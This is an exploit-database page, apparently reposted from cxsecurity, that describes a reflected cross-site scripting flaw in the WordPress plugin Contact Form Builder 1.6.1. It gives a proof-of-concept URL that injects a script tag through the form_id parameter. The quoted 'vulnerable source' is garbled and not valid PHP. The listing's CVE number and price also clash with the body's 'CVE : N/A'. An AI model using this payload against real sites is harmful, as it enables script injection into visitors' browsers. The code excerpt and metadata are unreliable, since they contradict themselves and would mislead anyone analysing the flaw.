Advertisement






Wordpress Plugin Contact Form Builder 1.6.1 - Cross-Site Scripting

CVE Category Price Severity
CVE-2018-15496 CWE-79 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2020-03-24
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L 0.5 0.7

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020030132

Below is a copy:

Wordpress Plugin Contact Form Builder 1.6.1 - Cross-Site Scripting
* Exploit Title: Wordpress Plugin Contact Form Builder 1.6.1 - Cross-Site Scripting
* Google Dork: N/A
* Date: 2020.03.23
* Exploit Author: Milad Karimi
* Vendor Homepage: https://wordpress.org/plugins/contact-forms-builder/
* Software Link: https://wordpress.org/plugins/contact-forms-builder/
* Category : webapps
* Version: 1.6.1
* Tested on: windows 10 , firefox
* CVE : N/A

Vulnerable page :
/edit-form.php


Vulnerable Source:
    1094: echo echo $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']; 
    130: if(isset($_GET['form_id']))
    1094: if(!empty($cancel_redirect_url)) else

POC :
http://localhost/code_generator.php?form_id=<script>alert('xss')</script>


************************
* ==> Contact Me :
* Telegram : @Ex3ptionaL
* Email : [email protected] Email: [email protected]
* Instagram : @m.i.l.a.d_._k.a.r.i.m.i
************************

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.